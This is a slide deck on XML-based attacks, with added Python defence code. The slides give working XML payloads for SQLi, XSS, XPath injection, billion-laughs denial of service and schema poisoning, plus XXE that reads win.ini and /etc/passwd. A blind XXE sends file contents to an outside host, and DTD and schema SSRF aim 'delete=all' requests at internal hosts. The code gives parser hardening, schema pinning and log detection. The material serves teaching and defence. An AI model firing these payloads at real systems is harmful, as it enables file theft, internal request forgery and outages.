XML Based Attacks: Daniel Tomescu

The document summarizes XML-based attacks, including: - XML injection vulnerabilities similar to SQLi and XSS via modifying XML payloads. - DTD attacks like XML external entity (XXE) and billion laughs DoS via XML bomb definitions. - XML schema attacks including server-side request forgery (SSRF) by defining external schema locations.

Uploaded by

devil
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
80 views25 pages

XML Based Attacks: Daniel Tomescu

The document summarizes XML-based attacks, including: - XML injection vulnerabilities similar to SQLi and XSS via modifying XML payloads. - DTD attacks like XML external entity (XXE) and billion laughs DoS via XML bomb definitions. - XML schema attacks including server-side request forgery (SSRF) by defining external schema locations.

Uploaded by

devil
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 25

XML Based Attacks

Daniel Tomescu

About me

Work and education:
• Pentester @ KPMG Romania
• Moderator @ Romanian Security Team
• Student @ Master of Information Management and Security, UPB

Hint: We're hiring!

My interests:
• Web/mobile application penetration tests
• Internal network penetration tests
• Curious about mobile and embedded devices
• Bug bounty hunter
Pentest 101

Input: Our payload
admin'+or+'1'='1'--+

Process: What we are testing
Login page

Output: (Un)expected result
Authentication bypass

Roadmap

1 • XML in a few words

2 • Common vulnerabilities

3 • DTD Attacks

4 • XML Schema Attacks

5 • Xpath Injection

6 • Demo + Q & A
XML Usage

• Web apps
- XML-RPC;
- SOAP;
- RSS;

• Documents
- PDFs;
- Office suite;
- eBooks;

• Mobile apps

• Content management

XML Family

• Lots of components

• Complex structure

• Many parsing stages

• Parsing errors

• Security vulnerabilities?

Common vulnerabilities (1)

SQL Injection

Classic example:
http://target.com/login.php?user=admin&pass=a'+or+'1'='1

Equivalent XML Payload:


<?xml version="1.0" encoding="UTF-8"?>
<root>
<user>admin</user>
<pass>a' or '1'='1</pass>
</root>

Common vulnerabilities (2)

Cross-Site Scripting

Classic example:
http://example.com/search.php?query=a"><script>alert("123")</script>

Equivalent XML Payload:


<?xml version="1.0" encoding="UTF-8"?>
<root>
<query>a"%3E%3Cscript%3Ealert("123")%3C/script%3E</query>
</root>
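Both slides make the same point: XML is only the transport, and the classic injection still lands in the same sink on the server. The following is an added Python example (not from the slides) that parses the two XML bodies shown above and contrasts a concatenating SQL query and an unescaped HTML reflection with their fixed forms. The in-memory users table, the request bodies and the password value are constructed for this example.

```python
import html
import sqlite3
import xml.etree.ElementTree as ET

# Constructed request bodies: the slides' XML equivalents of the SQLi and XSS payloads.
LOGIN_OK = b"""<?xml version="1.0" encoding="UTF-8"?>
<root><user>admin</user><pass>hunter2</pass></root>"""
LOGIN_SQLI = b"""<?xml version="1.0" encoding="UTF-8"?>
<root><user>admin</user><pass>a' or '1'='1</pass></root>"""
SEARCH_XSS = b"""<?xml version="1.0" encoding="UTF-8"?>
<root><query>a"&gt;&lt;script&gt;alert("123")&lt;/script&gt;</query></root>"""


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table (plaintext password only to keep the demo short)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'hunter2')")
    return db


def fields(body: bytes) -> dict:
    """Return {tag: text} for the children of <root>; the XML parser decodes &gt; etc. for us."""
    return {child.tag: child.text or "" for child in ET.fromstring(body)}


def login_vulnerable(db: sqlite3.Connection, body: bytes) -> bool:
    """The transport changed from a query string to XML, but the sink is the same concatenated SQL."""
    f = fields(body)
    sql = "SELECT 1 FROM users WHERE name='%s' AND pass='%s'" % (f["user"], f["pass"])
    return db.execute(sql).fetchone() is not None


def login_safe(db: sqlite3.Connection, body: bytes) -> bool:
    """Bound parameters: the quote inside the password is data, not SQL syntax."""
    f = fields(body)
    row = db.execute("SELECT 1 FROM users WHERE name=? AND pass=?", (f["user"], f["pass"])).fetchone()
    return row is not None


def render_result_vulnerable(body: bytes) -> str:
    """Reflecting the parsed <query> text into HTML unescaped reintroduces the XSS."""
    return "<p>No results for %s</p>" % fields(body)["query"]


def render_result_safe(body: bytes) -> str:
    """Escape at the HTML sink; what the XML parser handed us is plain text, not markup."""
    return "<p>No results for %s</p>" % html.escape(fields(body)["query"], quote=True)
```

The XML parser has already turned `&gt;` and `&lt;` back into `>` and `<` by the time the value reaches application code, so "it came in as XML" gives no protection at all: the fix is the same parameterised query and output encoding as for the query-string version.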

About DTDs

Notes.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "Notes.dtd">
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

Notes.dtd (an external DTD file holds only the declarations; the <!DOCTYPE note [ ... ]> wrapper is the internal-subset form, which lives inside the document itself)
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>

DTDs : XXE Attacks (1)

Request containing an external entity

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE updateProfile [
<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]>

<updateProfile>
<firstname>Joe</firstname>
<lastname>&file;</lastname>
</updateProfile>

DTDs : XXE Attacks (2)

Blind XXE Attack

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE updateProfile [
<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY send SYSTEM 'http://example.com/?%file;'> ]>

<updateProfile>
<firstname>Joe</firstname>
<lastname>&send;</lastname>
</updateProfile>

DTDs : Denial of Service (1)

Billion Laughs Attack / XML Bomb

<?xml version="1.0" encoding="utf-8"?>


<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

DTDs : Denial of Service (2)

XML Bomb variations

Variation 1: recursive entity references

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol1 "&lol2;">
<!ENTITY lol2 "&lol1;">
]>
<lolz>&lol1;</lolz>

Variation 2: one large entity referenced many times

<?xml version="1.0"?>
<!DOCTYPE kaboom [
<!ENTITY a "aaaaaaaaaaaaaaaaaa...">
]>
<boom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</boom>

.NET Code fix for XML Bombs

XmlReaderSettings settings = new XmlReaderSettings();
// ProhibitDtd is obsolete from .NET 4.0 on; the equivalent is DtdProcessing = DtdProcessing.Parse
// (DtdProcessing.Prohibit refuses the DOCTYPE outright when DTDs are not needed at all).
settings.ProhibitDtd = false;
// Caps the total characters produced by entity expansion, so a billion-laughs DTD fails fast
// instead of exhausting memory. It does not stop external entity resolution on its own;
// XmlResolver = null is needed for that.
settings.MaxCharactersFromEntities = 1024;
XmlReader reader = XmlReader.Create(stream, settings);

DTDs : SSRF Attacks (1)

Server Side Request Forgery attack example:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE updateProfile [
<!ENTITY ssrf SYSTEM 'http://10.0.0.2/users.php?delete=all'> ]>

<updateProfile>
<firstname>Joe</firstname>
<lastname>&ssrf;</lastname>
</updateProfile>
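The XXE, blind XXE, billion-laughs and DTD-based SSRF payloads on the preceding slides all depend on one thing: the parser accepting a DOCTYPE. The following is an added Python example (not from the slides) of the defence the .NET settings above approximate, built on the standard library's expat bindings: it refuses any DOCTYPE, entity declaration or external entity reference, so each of those documents is rejected before an entity is declared, let alone resolved. The sample documents and the flat updateProfile field layout are constructed for this example.

```python
import xml.parsers.expat as expat


class DtdRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE, an entity declaration or an external reference."""


def _refuse_doctype(name, sysid, pubid, has_internal_subset):
    # Fires as soon as <!DOCTYPE is seen, before any internal subset is read.
    raise DtdRejected(f"DOCTYPE {name!r} is not allowed in untrusted input")


def _refuse_entity(name, is_param, value, base, sysid, pubid, notation):
    # Defence in depth: no entity declaration of any kind gets registered.
    raise DtdRejected(f"entity declaration {name!r} is not allowed")


def _refuse_external(context, base, sysid, pubid):
    # Never fetch file://, http:// or any other external entity.
    raise DtdRejected(f"external entity reference to {sysid!r} is not allowed")


def parse_untrusted(xml_bytes: bytes) -> dict:
    """Parse a flat <updateProfile>-style document into {tag: text}, refusing any DTD."""
    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = _refuse_doctype
    p.EntityDeclHandler = _refuse_entity
    p.ExternalEntityRefHandler = _refuse_external
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    fields, stack = {}, []

    def start(tag, attrs):
        stack.append(tag)
        fields.setdefault(tag, "")

    def chars(data):
        if stack:
            fields[stack[-1]] += data  # character data may arrive in several chunks

    p.StartElementHandler = start
    p.EndElementHandler = lambda tag: stack.pop()
    p.CharacterDataHandler = chars
    p.Parse(xml_bytes, True)
    return fields


def is_rejected(xml_bytes: bytes) -> bool:
    """True when the hardened parser refuses the document."""
    try:
        parse_untrusted(xml_bytes)
    except DtdRejected:
        return True
    return False


# Constructed inputs: a benign profile update and the slides' DTD-based payloads.
BENIGN = b"<updateProfile><firstname>Joe</firstname><lastname>Smith</lastname></updateProfile>"
XXE = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE updateProfile [
<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]>
<updateProfile><firstname>Joe</firstname><lastname>&file;</lastname></updateProfile>"""
BOMB = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""
SSRF = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE updateProfile [
<!ENTITY ssrf SYSTEM "http://10.0.0.2/users.php?delete=all"> ]>
<updateProfile><firstname>Joe</firstname><lastname>&ssrf;</lastname></updateProfile>"""
```

Rejecting the DOCTYPE is the equivalent of DtdProcessing.Prohibit and is the right default for an API that never needs DTDs. Where a DTD genuinely must be accepted, keep the entity and external-reference handlers and add an expansion budget, which is what MaxCharactersFromEntities does on the .NET side.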

DTDs : SSRF Attacks (2)

XML Schema

Notes.xml (xsi:schemaLocation pairs each namespace with the location of its schema)
<?xml version="1.0" encoding="UTF-8"?>
<note xmlns="http://www.w3schools.com"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.w3schools.com Notes.xsd">
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

Notes.xsd
<?xml version="1.0"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
targetNamespace="http://www.w3schools.com"
xmlns="http://www.w3schools.com"
elementFormDefault="qualified">
<xs:element name="note">
<xs:complexType>
<xs:sequence>
<xs:element name="to" type="xs:string"/>
<xs:element name="from" type="xs:string"/>
<xs:element name="heading" type="xs:string"/>
<xs:element name="body" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:schema>
XML Schema SSRF

Server Side Request Forgery attack example:

<?xml version="1.0" encoding="utf-8"?>


<roottag xmlns="http://10.0.0.1/users.php?delete=all"
xmlns:secondaryns="http://10.0.0.2/users.php?delete=all"
xmlns:xsi="http://10.0.0.3/users.php?delete=all"
xsi:schemaLocation="http://10.0.0.4/users.php?delete=all">

<secondaryns:s> Hello! </secondaryns:s>

</roottag>

XML Schema Poisoning attack

<?xml version="1.0" encoding="utf-8"?>


<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">

<xs:element name="note">
<xs:complexType>
<xs:sequence>
<xs:element name="to" type="xs:string"/>
<xs:element name="from" type="xs:string"/>
<xs:element name="heading" type="xs:string"/>
<xs:element name="body" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>

</xs:schema>
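The two schema slides share one defensive rule: a validating parser must never fetch a schema from a URL the document supplies, and the schema it does use must be the one the application shipped. The following is an added Python example (not from the slides) that does both halves without any XSD library: it inventories namespace URIs and schemaLocation hints from a document without resolving them, and serves schemas only from a local store checked against a digest pinned at deploy time. The store, the pins and the two sample documents are constructed for this example; the Notes schema mirrors the one on the XML Schema slide.

```python
import hashlib
import io
import xml.etree.ElementTree as ET

DISALLOWED_SCHEMES = ("http:", "https:", "ftp:", "file:")
SCHEMA_HINTS = ("schemaLocation", "noNamespaceSchemaLocation")


def schema_references(xml_bytes: bytes) -> dict:
    """List namespace URIs and schema-location hints without resolving any of them."""
    namespaces, locations, problems = [], [], []
    events = ET.iterparse(io.BytesIO(xml_bytes), events=("start-ns", "start"))
    for event, payload in events:
        if event == "start-ns":
            namespaces.append(payload[1])            # payload is (prefix, uri)
            continue
        for attr, value in payload.attrib.items():
            # Match on the local name only: a hint bound to a bogus xsi prefix is still suspicious.
            if attr.rsplit("}", 1)[-1] not in SCHEMA_HINTS:
                continue
            tokens = value.split()
            if attr.endswith("noNamespaceSchemaLocation"):
                locations.extend(tokens)
            elif len(tokens) % 2:                     # schemaLocation must be namespace/location pairs
                problems.append(f"malformed schemaLocation: {value!r}")
                locations.extend(tokens)
            else:
                locations.extend(tokens[1::2])        # every second token is a location
    for loc in locations:
        if loc.lower().startswith(DISALLOWED_SCHEMES):
            problems.append(f"remote schema location: {loc}")
    return {"namespaces": namespaces, "locations": locations, "problems": problems}


# Constructed trusted store: schemas ship with the application and are pinned by hash at deploy time.
NOTES_XSD = b"""<?xml version="1.0"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="http://www.w3schools.com"
           xmlns="http://www.w3schools.com" elementFormDefault="qualified">
<xs:element name="note"><xs:complexType><xs:sequence>
<xs:element name="to" type="xs:string"/><xs:element name="from" type="xs:string"/>
<xs:element name="heading" type="xs:string"/><xs:element name="body" type="xs:string"/>
</xs:sequence></xs:complexType></xs:element></xs:schema>"""
TRUSTED_SCHEMAS = {"http://www.w3schools.com": NOTES_XSD}
SCHEMA_PINS = {ns: hashlib.sha256(data).hexdigest() for ns, data in TRUSTED_SCHEMAS.items()}


def load_trusted_schema(namespace: str, store=TRUSTED_SCHEMAS, pins=SCHEMA_PINS) -> bytes:
    """Serve a schema only from the local store, and only if it still matches its pinned digest."""
    if namespace not in store:
        raise LookupError(f"no trusted schema for namespace {namespace!r}")
    data = store[namespace]
    if hashlib.sha256(data).hexdigest() != pins.get(namespace):
        raise ValueError(f"schema for {namespace!r} failed its integrity check")
    return data


def schema_is_trusted(namespace: str, store=TRUSTED_SCHEMAS, pins=SCHEMA_PINS) -> bool:
    try:
        load_trusted_schema(namespace, store, pins)
        return True
    except (LookupError, ValueError):
        return False


# Constructed documents: the benign Notes.xml and the schema-SSRF payload from the slides.
NOTES_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xsi:schemaLocation="http://www.w3schools.com Notes.xsd"><to>Tove</to><from>Jani</from>
<heading>Reminder</heading><body>Don't forget me this weekend!</body></note>"""
SSRF_XML = b"""<?xml version="1.0" encoding="utf-8"?>
<roottag xmlns="http://10.0.0.1/users.php?delete=all"
         xmlns:secondaryns="http://10.0.0.2/users.php?delete=all"
         xmlns:xsi="http://10.0.0.3/users.php?delete=all"
         xsi:schemaLocation="http://10.0.0.4/users.php?delete=all">
<secondaryns:s> Hello! </secondaryns:s></roottag>"""
```

Namespace URIs are identifiers, not download locations, so the inventory reports them but the loader keys on them only to look up a local file. Whether a real validator would even honour the schemaLocation in the SSRF document (its xsi prefix is bound to a bogus namespace) is beside the point; the gate is deliberately conservative and flags it either way.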

XML XPath

Notes.xml
<?xml version="1.0" encoding="UTF-8"?>
<bookstore>
<book category="COOKING">
<title lang="it">Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.00</price>
</book>
<book category="CHILDREN">
<title lang="en">Harry Potter</title>
<author>J K. Rowling</author>
<year>2005</year>
<price>19.99</price>
</book>
</bookstore>

XPath expressions
/bookstore/book[1]
/bookstore/book[price>25.00]/title
//title[@lang='en']
/bookstore/book[last()]
XPath Injection

employees.xml
<?xml version="1.0" encoding="utf-8"?>
<Employees>
<Employee ID="1">
<Name>Mike</Name>
<UserName>Mike07</UserName>
<Password>TopSecret</Password>
<Type>Admin</Type>
</Employee>
</Employees>

C# (the query is assembled by string concatenation from request parameters; XPath keywords are lowercase, so the operator is and):
String FindUserXPath;
FindUserXPath = "//Employee[UserName/text()='"
    + Request["Username"]
    + "' and Password/text()='"
    + Request["Password"] + "']";

Payload
Username: Mike07
Password: oops' or 'a'='a

Result - FindUserXPath becomes

//Employee[UserName/text()='Mike07' and Password/text()='oops' or 'a'='a']
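XPath 1.0 has no escape character inside string literals, which is why the slide's concatenation cannot simply backslash the quote. The following is an added Python example (not from the slides) with two defences for the query above: a literal builder that splits values containing both quote kinds across concat(), and a structural lookup that selects by username only and compares the secret in code rather than inside the query. The employees document is a constructed copy of the slide's employees.xml.

```python
import hmac
import xml.etree.ElementTree as ET

# Constructed copy of the slide's employees.xml.
EMPLOYEES_XML = b"""<?xml version="1.0" encoding="utf-8"?>
<Employees>
<Employee ID="1">
<Name>Mike</Name>
<UserName>Mike07</UserName>
<Password>TopSecret</Password>
<Type>Admin</Type>
</Employee>
</Employees>"""


def xpath_literal(value: str) -> str:
    """Render a string as an XPath 1.0 literal. XPath has no escape character, so a value
    containing both quote kinds has to be split with concat()."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"


def build_login_xpath(username: str, password: str) -> str:
    """Same query as the slide's C#, but every user value goes through xpath_literal()."""
    return (f"//Employee[UserName/text()={xpath_literal(username)} "
            f"and Password/text()={xpath_literal(password)}]")


def authenticate(xml_bytes: bytes, username: str, password: str):
    """Structural alternative: select the record by username, compare the secret in code.
    Returns the employee <Type> on success, None otherwise."""
    root = ET.fromstring(xml_bytes)
    for emp in root.findall("Employee"):
        if emp.findtext("UserName") == username:
            stored = emp.findtext("Password") or ""
            if hmac.compare_digest(stored.encode(), password.encode()):
                return emp.findtext("Type")
            return None
    return None
```

With the literal builder, the slide's payload becomes a double-quoted string value that happens to contain single quotes and the word or; the predicate still has exactly two comparisons. The structural version avoids building an expression from user input at all, which is the better default when the XPath engine offers no variable binding.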

Content-Type header (1)

HTTP Request (JSON):

POST /update.php HTTP/1.1
Host: target.com
Accept: application/json
Content-Type: application/json
Content-Length: 38

{"search":"name","value":"val"}

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name val"}

HTTP Request (XML, same endpoint):

POST /update.php HTTP/1.1
Host: target.com
Accept: application/json
Content-Type: application/xml
Content-Length: 112

<?xml version="1.0" encoding="UTF-8" ?>
<root>
<search>name</search>
<value>val</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name val"}

Content-Type header (2)

HTTP Request:

POST /update.php HTTP/1.1
Host: target.com
Accept: application/json
Content-Type: application/xml
Content-Length: 228

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE xxe [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467

{"error": "no results for name
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
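The two Content-Type slides show a JSON endpoint that silently grows an XML parser the moment the client changes one header. The following is an added Python example (not from the slides) of the server-side rule that closes this off, plus the same rule applied as a detection over access logs: the body parser is chosen from the server's policy for the path, never from the client's header alone, and requests whose media type the endpoint never offered are flagged. The policy table, the log format and the log lines are constructed for this example.

```python
import json
import re

# Constructed policy: the endpoint from the slides only ever receives JSON.
ALLOWED_BODY_TYPES = {"/update.php": {"application/json"}}


class UnsupportedMediaType(Exception):
    """Maps to HTTP 415; raised before any body parser is selected."""


def media_type(content_type: str) -> str:
    """Normalise 'Application/JSON; charset=utf-8' to 'application/json'."""
    return content_type.split(";", 1)[0].strip().lower()


def is_xml_media_type(mt: str) -> bool:
    """text/xml, application/xml and any structured-syntax suffix such as application/soap+xml."""
    return mt in ("text/xml", "application/xml") or mt.endswith("+xml")


def parse_body(path: str, content_type: str, body: bytes) -> dict:
    """Select the parser from the server's policy for the path, never from the client's header alone."""
    mt = media_type(content_type)
    allowed = ALLOWED_BODY_TYPES.get(path, set())
    if mt not in allowed:
        raise UnsupportedMediaType(f"{path} accepts {sorted(allowed)}, got {mt!r}")
    if mt == "application/json":
        data = json.loads(body)
        if not isinstance(data, dict):
            raise ValueError("expected a JSON object")
        return data
    # No XML branch exists for this endpoint, so there is no parser to switch into.
    raise UnsupportedMediaType(mt)


def body_accepted(path: str, content_type: str, body: bytes) -> bool:
    try:
        parse_body(path, content_type, body)
        return True
    except (UnsupportedMediaType, ValueError):
        return False


# Constructed access-log lines: method, path, request Content-Type, status, response bytes.
LOG_LINES = [
    'POST /update.php ct="application/json" 200 43',
    'POST /update.php ct="application/xml" 200 43',
    'POST /update.php ct="application/xml" 200 2467',
    'POST /update.php ct="application/json; charset=utf-8" 200 43',
]
LOG_RE = re.compile(r'^(?P<method>\S+) (?P<path>\S+) ct="(?P<ct>[^"]*)" (?P<status>\d+) (?P<bytes>\d+)$')


def flag_content_type_switches(lines) -> list:
    """Detection view of the same policy: (path, media type, response bytes, is_xml) for every
    request whose body type the endpoint never offered."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        mt = media_type(m["ct"])
        if mt not in ALLOWED_BODY_TYPES.get(m["path"], set()):
            flagged.append((m["path"], mt, int(m["bytes"]), is_xml_media_type(mt)))
    return flagged
```

The response size on the second flagged line is the second signal the slide shows: a 43-byte error that suddenly becomes 2467 bytes on an XML request is worth an alert on its own, even before anyone reads the body.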

Cross your fingers!

Questions?

Thank you!

Contact:
[email protected]
[email protected]
